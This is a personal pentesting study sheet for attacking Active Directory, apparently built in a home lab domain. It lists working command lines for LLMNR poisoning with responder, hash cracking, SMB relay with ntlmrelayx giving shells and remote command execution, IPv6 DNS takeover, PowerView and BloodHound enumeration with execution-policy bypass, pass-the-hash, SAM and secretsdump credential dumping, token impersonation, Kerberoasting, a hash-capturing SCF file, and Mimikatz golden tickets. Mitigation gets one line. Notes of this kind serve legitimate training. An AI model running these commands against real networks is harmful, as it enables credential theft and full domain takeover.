AD Pentesting Notes

Basics
AD --> Directory service to manage Windows domain networks Stores information related to
objects e.g. Computers, Users, Printers, etc. Authentication --> using Kerberos

Physical components of Active Directory: Domain Controller It hosts copy of the

AD Directory Store Provides authentication and authorization Administrative access to manage
user accounts & network resources

AD DS Data Store

1. Consists of NTDS.dit

Logical components of Active Directory:

-> AD Schema: Blueprint of what type of object can be stored within the AD --> Domain: Used
to group and manage objects in organizations --> Tree: Group of domains (Can have child
domains) --> Forest: Collection of trees --> Organizational Units: Containers for users, groups,
etc. --> Trust: How we have access between resources Directional: Flows from trusting domain
to trusted domain Transitive: Trust relationship is extended beyond a two-domain trust to
include other trusted domains. --> Objects: What is present inside an OU

Initial Attack Vector

LLMR Poisoning Steps:

2. Victim tries to know where a specific device is present let’s say printer.
3. Server let’s say doesn’t know where it is so it won’t respond that i do know
4. Victim sends a broadcast message in the network
5. Attacker running responder responds that yes I am the printer, send me your hash and i’ll
connect you
6. Victim sends the hash
7. Attacker cracks and it and bingo! Inside the AD environment
Steps to perform attack:

8. Run responder using following command: responder -I eth0 -dw

9. Save the hash captured
10. Crack using following command: hashcat -m 5600 hash.txt wordlist_to_use.txt

Mitigation:

11. Disable LLMNR & NBT-NS

12. Good strong password

SMB Relay attack:

Instead of cracking the hash, we relay those hashes to specific machines and gain access

Requirements:

13. SMB Signing should be disabled

14. the machine on which we’re authenticating after relaying should be of admin
Before running responder, set this configuration for responder’s configuration file

—> For checking hosts that have SMB Signing disabled:

nmap --script=smb2-security-mode.nse -p445 192.168.61.0/24

the IPs that do have SMB signing enabled but don’t required are the one that we do need

now run responder: responder -I eth0 -dw

now run ntlmrelayx:

python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -tf

targets.txt -smb2support
In order to gain interactive shell on the system, use following command:

python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -tf

targets.txt -smb2support -i

We can also use following command which will execute whoami command:

python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -tf

targets.txt -smb2support -c "whoami"
Gaining shell:

python3 /usr/share/doc/python3-impacket/examples/psexec.py
marvel.local/fcastle:[email protected]

python3 /usr/share/doc/python3-impacket/examples/smbexec.py
marvel.local/fcastle:[email protected]

IPv6 DNS Takeover

mitm6 -d marvel.local

python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -6 -t
ldaps://<DC's IP> -wh fakewpad.marvel.local -l lootme

Post Compromise Enumeration

15. PowerView

https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/refs/heads/master/Recon/Pow
erView.ps1 

Invoke-WebRequest
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/refs/heads/mas
ter/Recon/PowerView.ps1 -Outfile PowerView.ps1
For bypassing execution policy: powershell -ep bypass

. .\\PowerView.ps1

Get-NetDomain —> gets info about domain

Get-NetDomainController —> tells where the Domain Controller is and other info

Get-DomainPolicy —> get different policies of the domain

(Get-DomainPolicy).”system access” —> system access policy info

Get-NetUser —> get info about all users

Get-NetUser | select cn —> will display only common name

Get-NetUser | select samaccountname —> display sam account name (used to login e.g.
MARVEL\Administrator)

Get-NetUser | select description —> display description of accounts

Get-UserProperty —> display the properties that users can have

Get-UserProperty -Properties pwdlastset —> last password set property of all

accounts

Get-NetComputer → get all computers in the domain

Get-NetComputer | select OperatingSystem → shows OS running on the computers

Get-NetGroup —> lists all the groups

Get-DomainGroupMember "Domain Admins” —> gets all the users of Domain Admins group

Invoke-ShareFinder → finds all the shares on the network

Get-NetGPO

1. BloodHound

apt install bloodhound

neo4j console

baaki setup kar lena

bloodhound
in windows machine:

Invoke-WebRequest https://raw.githubusercontent.com/SpecterOps/BloodHound-
Legacy/refs/heads/master/Collectors/SharpHound.ps1 -Outfile SharpHound.ps1

powershell -ep bypass

. .\\SharpHound.ps1

Invoke-BloodHound -CollectionMethod All -Domain MARVEL.local -ZipFileName

file.zip

now copy the zip file to the system where you have bloodhound

Post Compromise Attacks

2. Pass the Hash

Use hash to login to the system

apt install crackmapexec

Pass the password using crackmapexec: crackmapexec smb 192.168.61.0/24 -u

fcastle -d MARVEL.local -p Password1

Dump SAM File: crackmapexec smb 192.168.61.0/24 -u fcastle -d MARVEL.local

-p Password1 --sam

dump hashes using secretsdump:

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py
marvel.local/fcastle:[email protected]

hashcat -m 1000 hashes.txt wordlist.txt

crackmapexec smb <IP> -u username -p password —local-auth

3. Token Impersonation

Tokens: Temporary keys that allow you to access to a system or network without providing
creds

Delegate token: used for logging into machine or using RDP

Impersonate token: domain logon script or network drive

 steps: run exploit/windows/smb/psexec in metasploit

after getting meterpreter, run following commands:

load incognito

list_tokens -u

impersonate_token marvel\\\\administrator

4. Kerberoasting

python3 GetUserSPNs.py marvel.local/fcastle:Password1 -dc-ip

192.168.61.129 -request

hashcat -m 13100 hashes.txt wordlist.txt

5. GPP Attack

Group Policy Preferences attack —> allow admins to create policies using embedded
credentials

6. URL File Attack (SCF Attack)

Should’ve a compromised user with a share or on open share

Save a file as:

[InternetShortcut] URL=blah WorkingDirectory=blah

IconFile=\\\\192.168.61.128\\%USERNAME%.icon InconIndex=1

baaki responder hi chalaana hai bas

7. Mimikatz

tool used to view and steal creds, generate kerberos tickets and leverage attacks

privilege::debug —> allowing to debug a process that we won’t otherwise have access
to

sekurlsa::logonpasswords —> to find all logged in passwords

lsadump::sam —> used to dump SAM

lsadump::lsa /patch —> dump LSA

8. Golden ticket attack

Use the hash of krbtgt account to generate a TGT

Use this TGT to access any resource on the system

steps:

privilege::debug

lsadump::lsa /inject /name:krbtgt

from the output, use following

kerberos::golden /User:Administrator /domain:marvel.local /sid:<SID OF

krbtgt> /krbtgt:<NTLM hash of krbtgt account> /id:500 /ptt

misc::cmd